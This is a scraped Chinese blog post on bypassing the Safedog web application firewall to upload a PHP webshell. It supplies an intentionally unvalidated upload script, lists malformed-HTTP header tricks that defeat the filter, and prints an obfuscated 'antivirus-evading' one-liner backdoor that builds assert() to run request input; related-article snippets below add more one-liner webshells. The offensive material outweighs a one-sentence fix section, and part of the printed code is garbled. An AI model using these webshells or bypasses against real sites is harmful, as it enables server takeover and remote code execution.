00截断上传绕过_绕过网站安全狗拦截,上传Webshell技巧总结(附免杀PHP一句话)...

最新推荐文章于 2024-05-29 13:35:05 发布
最新推荐文章于 2024-05-29 13:35:05 发布
阅读量240 收藏
点赞数
文章标签: 00截断上传绕过
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39663970/article/details/111727676
版权

思路是:修改HTTP请求,构成畸形HTTP请求,然后绕过网站安全狗的检测。

废话不多说,切入正题。。。。

1、实验环境:

Windows Server 2003、 Apache/2.4.18、PHP/5.3.29、网站安全狗(Apache版)V3.5.12048

2、用于文件上传的PHP源码:<?php

$path = dirname(__FILE__) . '/upload/';

$rand = rand(0,30);

move_uploaded_file($_FILES["file"]["tmp_name"],$path . $rand . $_FILES["file"]["name"]);

echo "File Path:" . $path . $rand . $_FILES["file"]["name"] . "
";

echo "OK";

?>

因为此次实验的目的是绕过网站安全狗,所以PHP源码上我没做任何检测,把上传的文件直接放在upload目录下。

3、先看一下正常的HTTP请求:

很明显,文件名为”yijuhua.php”被拦截。。。。

4、尝试%00截断:

很明显,失败了。。。

5、修改HTTP请求,构造畸形HTTP请求

(1)删除实体里面的Conten-Type字段:

绕过网站安全狗的拦截,成功上传WebShell。。。

(2)删除Content-Disposition字段里的空格:

(3)修改Content-Disposition字段值的大小写:

6、菜刀连接一句话:

到此,上传WebShell结束,各位看明白了吗?

7、免杀PHP一句话:<?php

/*

PHP一句话木马

assert($string)

*/

$arr = array('a','s','s','e','r','t');

$func = '';

for($i=0;$i

$func .= $func . $arr[$i];

}

$func($_REQUEST['c']);

?>

8、修复漏洞:

出现这种情况,我认为是网站安全狗在开发时没有考虑到畸形HTTP请求,而Apache却兼容畸形HTTP请求,所以能够上传成功。

weixin_39663970
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
2016最新php免杀webshell安全狗
03-05
这个文件可能是经过特殊处理的,比如包含了免杀技巧,使得它能够绕过安全狗的检测。 综上所述,这个压缩包提供的知识点主要集中在PHP免杀Webshell技术和如何绕过Web应用防火墙,尤其是针对2016年环境的安全策略。这...
实战-从社工客服拿到密码登录后台加SQL注入绕过安全狗写入webshell到提权进内网漫游.pdf
03-21
本资源为一篇实战渗透测试笔记,记录了作者从社工客服拿到密码登录后台加 SQL 注入绕过安全狗写入 webshell 到提权进内网漫游的整个过程。 一、初探 作者首先尝试使用自制字典工具“御剑”扫描网站,但发现无法...
安全狗阻止iis运行php,网站安全狗禁止IIS执行程序bypass
weixin_42389030的博客
03-12 374
网站安全狗拦截命令的执行:执行白名单中的程序不会被拦截:但是执行白名单中的程序并不是我们想要的结果(我想要提权,想要执行exp.exe),那该怎么办呢?经过反复的测试,发现安全狗拦截的是IIS(时间久远,具体是aspnet_wp.exe还是w3wp.exe我记不清了)创建的进程。由IIS启动的进程再去执行命令会不会被拦截呢?但是在想这个问题的时候,要先解决一个问题,那就是如何让IIS启动的进程再...
安全狗阻止sublime text 编辑器修改保存PHP文件解决方法
Leesanghyeok的博客
12-04 220
在sunlime text编辑器删修改后无法保存,出现下图问题 解决办法: 打开安全狗,找到主动防御->文件及目录保护->全站禁止写入PHP-ASP-ASPX处,如下图所示 点击该项进入->高级规则设置->进程名->白名单模式,加入sublime_text.exe ...
分享几个PHPwebshell免杀思路
最新发布
2401_84466225的博客
05-29 1329
ps:远程获取的时候,其实也可以用fopen读取远程文件,更加方便点,但是感觉这个函数貌似比较常用,可能会被一些waf或者查杀工具查到,所以用到了远程获取的地方,分别使用了fopen函数和curl进行。
php网站安全狗绕过,网站安全狗最新版绕过测试
weixin_33279554的博客
03-10 186
测试时间:2014.10.21测试版本:IIS版V3.3.09476(2014-09-24)、Apache V3.1.08512(2014-05-29),均为今天能下到的最新版。用于绕过的核心字符:%0A,某些特殊场合需要和注释符配合使用。测试详细步骤:1、本机安装了存在注入的V5shop(构架为IIS6+ASPX+MSSQL2005,以测试IIS版本的安全狗),常规注入测试:Defaulthtt...
斗狗记之PHP一句话bypass
KEY0NE的个人博客
12-22 203
分享两个过狗的PHP一句话吧,并且讲一讲我的过狗思路<?php#木马免杀:从打狗到被狗咬 error_reporting(0); echo"404NotFound."; $building="ps_ot*^7#[emailprotected]@666666666666666666666666666...
过360一句话php,php一句话绕过技术分析
weixin_39959126的博客
03-28 328
0x00 前言目前主流的webshell查杀工具分为静态和动态检查,针对能够执行命令和代码的危险函数都会进行检查。网上公开的绕过技术一般都是通过各种方式(变形)隐藏危险函数,本文主要通过大量的测试来分析某知名的webshell查杀工具的规则,通过自己的分析来尝试绕过这些规则。0x01 查杀原理通过扫描大量的样本,发现了查杀的方法主要包括:1.正则匹配2.样本库:并不仅仅是文件MD5检查,还可能使用...
new.bypass_bypass_NEW_免杀_webshell_phpwebshell_
10-03
【标题】"new.bypass_bypass_NEW_免杀_webshell_phpwebshell_" 指的是一种新型的Webshell,它带有“bypass”和“NEW”特性,表明这是一个旨在绕过安全检测,且是最新技术的PHP WebshellWebshell通常被黑客用于远程...
2016最新aspx免杀webshell安全狗
03-05
上传压缩文件夹里的aspx文件不会有任何报毒,过最新版安全狗。2016已测试
安全狗的aspx一句话webshell
02-08
安全狗的aspx一句话webshell 纯CS模式,经典免杀
php一句话-D盾绕过技巧
zzgslh的博客
03-05 5961
php一句话-D盾绕过技巧,Platypus多会话的交互式反向 Shell 管理器
过狗一句话原理与利用
金色%夕阳的博客
05-03 1827
过狗一句话原理与利用 在之前的文件上传漏洞中就有介绍过木马文件,通过上传木马文件实现远程连接从而进行远程控制操作。利用上传文件漏洞上传木马文件过程中,可能会遇到服务端对上传文件后缀、文件名、文件格式以及文件内容等进行检测过滤,从而导致木马文件上传失败。如今存在很多过滤机制与安全产品能够实现网站上传保护,比如安全狗。因此,学习如何绕过这些保护机制成功上传木马文件是至关重要的。在下面的学习中我们称之为过狗一句话,该名称源于绕过安全狗的检测机制成功过上传一句话木马文件。 在学习过狗一句话之前,需要先学习一句话木马
过狗的一句话
qq_41814777的博客
10-20 979
php过狗一句话: waf通常以关键字来判断是否是一句话木马。 <?php $test="e#v#a#l"; $test1=explode("#",$test); $test2=$test1[0].$test1[1].$test1[2].$test1[3]; $test2($_POST['zt']); ?> 这是eval函数的一句话的写法 <?...
免杀】————1、PHP一句话过狗、卫士、D盾等免杀思路
Fly_鹏程万里
03-04 1694
00x1.关键字拆分 比如assert,可以写成 ‘a’.’ss’.’e’.’r’.’t’这样。 总结:这种方法虽然简单,但是却没有太强的免杀功效,需要结合其他方法。 00x2.可变变量、引用、可变函数。 可变变量:比如$a=$_POST[‘x’];$b=’a’;@eval($$b); 测试结果: 总结:这种方法对狗等WAF可以绕过哦~但是对于D盾这种多规则的是无效的!引用:比...
php 过狗一句话木马的编写
热门推荐
大方子
09-02 1万+
  我们都知道 这个是php一句话  &lt;?php assert($_POST['mima']); ?&gt;可是服务器的安全狗会识别到,我们要经过一些处理, 让安全狗不能认出我们的代码是一句话木马。 好多小白只会用一句话,但是不知道原理,我先大概说一下一句话木马的原理 assert是一个php的函数 assert(这里写代码)  这个函数会执行括号里的代码,(eval 的一句话木...
安全狗/D盾/360的PHP一句话木马与防范方法
主题模板站的博客
01-29 827
D盾,他不认识二维数组,所以就很轻松绕过了。对了 还有360哦~ 测试了下安全狗,也查不出来,,。防御方法:就是网站下载下来这些php文件,然后通过字符串查找,类似上面的字符。本文阐述了过安全狗/D盾/360的PHP一句话木马,欢迎大家多多指点。过D盾很容易,当然下面还提供一个0等级就的。这样改,立马就变成1个等级的了。过D盾PHP一句话木马。
一句话木马过狗 php,PHP一句话木马过安全狗等杀软
weixin_30774813的博客
03-09 312
第一种:1.php=($_=@$_GET[2]).@$_($_GET[1])?>用中国菜刀连接:http://www.cn-caidao.com/1.php?2=assert密码是1第二种:2.php$_="";$_[+""]='';$_="$_"."";$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");?>=${'_'.$_}['_'](${'_'....
PHPwebshell2022免杀bypass阿里云盾等所有安全设备
qq_37561898的博客
12-09 959
使用反序列化,外加php原生类绕过检测,到达webshell免杀。已经提过了长亭的牧云webshell检测平台,所以直接开源。使用加密器反序列化控制类名,以及参数,达到命令执行的效果。关键代码 echo new $sizeclass(可正常执行代码截图 / 命令的截图。绕过代码(POST 密码为a)关键类:Exception。
通过SELinux设置防止webshell.php一句话木马访问Linux服务器上nginx代理网站外的其他资源
06-11
可以通过SELinux设置防止webshell.php一句话木马访问Linux服务器上nginx代理网站外的其他资源,以下是具体步骤: 1. 确认SELinux状态:使用命令`getenforce`检查SELinux是否开启,如果输出`Enforcing`,则SELinux...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值